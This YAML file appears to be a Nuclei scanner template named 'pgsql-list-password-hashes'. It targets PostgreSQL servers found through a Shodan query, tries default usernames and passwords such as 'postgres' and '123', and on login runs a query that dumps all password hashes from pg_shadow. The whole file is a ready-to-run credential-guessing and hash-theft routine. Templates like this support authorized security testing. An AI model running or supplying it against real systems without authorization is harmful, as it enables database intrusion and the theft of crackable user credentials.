nuclei-templates/javascript/enumeration/pgsql/pgsql-list-password-hashes....

54 lines
1.7 KiB
YAML

id: pgsql-list-password-hashes
info:
name: PostgreSQL List Password Hashes
author: pussycat0x
severity: high
description: |
Dump password hashes in use within a PostgreSQL database.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md
metadata:
verified: true
max-request: 8
shodan-query: "product:\"PostgreSQL\""
tags: js,network,postgresql,authenticated,enum
javascript:
- pre-condition: |
var m = require("nuclei/postgres");
var c = m.PGClient();
c.IsPostgres(Host, Port);
code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
Export(connected)
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[] | "\(.usename) : \(.passwd)"'
# digest: 4b0a00483046022100eadfce2997111bfea81cb5e320364402b711a35bffcf2da9e7698419a2d02932022100984ef022c43f4883f758a43178f6817e3fb6ec4df6b91f59bb037aad300028d8:922c64590222798bb761d5b6d8e72950